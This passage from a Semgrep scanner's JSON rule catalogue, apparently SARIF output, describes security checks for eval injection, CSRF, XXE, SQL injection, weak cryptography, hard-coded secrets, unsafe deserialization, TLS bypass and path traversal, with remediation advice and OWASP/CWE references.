https://owasp.org/www-community/attacks/Code_Injection for more information."},"help":{"markdown":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string)\n - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html)\n","text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string","id":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","name":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.code.user-eval-format-string.user-eval-format-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls."},"help":{"markdown":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests)\n","text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","id":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","name":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","id":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","name":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"help":{"markdown":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","id":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","name":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli","id":"java.spring.security.jpa-sqli.jpa-sqli","name":"java.spring.security.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","id":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","name":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"help":{"markdown":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n","text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder","id":"java.lang.security.audit.xml-decoder.xml-decoder","name":"java.lang.security.audit.xml-decoder.xml-decoder","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-decoder.xml-decoder"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Onfido live API Token detected"},"help":{"markdown":"Onfido live API Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token)\n - [https://documentation.onfido.com/api/latest/#api-tokens](https://documentation.onfido.com/api/latest/#api-tokens)\n","text":"Onfido live API Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","id":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","name":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"help":{"markdown":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","id":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","name":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"help":{"markdown":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected)\n - [https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping](https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping)\n - [https://jinja.palletsprojects.com/en/2.11.x/intro/#](https://jinja.palletsprojects.com/en/2.11.x/intro/#)\n","text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected","id":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","name":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.mako-templates-detected.mako-templates-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"help":{"markdown":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification)\n - [https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate](https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate)\n - [https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1](https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1)\n","text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","id":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","name":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"help":{"markdown":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow](https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow)\n","text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos","id":"cpp.lang.security.strings.std-string-npos.std-string-npos","name":"cpp.lang.security.strings.std-string-npos.std-string-npos","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.std-string-npos.std-string-npos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"help":{"markdown":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.nan-injection.nan-injection)\n - [https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868](https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868)\n - [https://blog.bitdiscovery.com/2021/12/python-nan-injection/](https://blog.bitdiscovery.com/2021/12/python-nan-injection/)\n","text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"helpUri":"https://semgrep.dev/r/python.django.security.nan-injection.nan-injection","id":"python.django.security.nan-injection.nan-injection","name":"python.django.security.nan-injection.nan-injection","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.nan-injection.nan-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli)\n - [https://www.psycopg.org/docs/sql.html](https://www.psycopg.org/docs/sql.html)\n","text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, 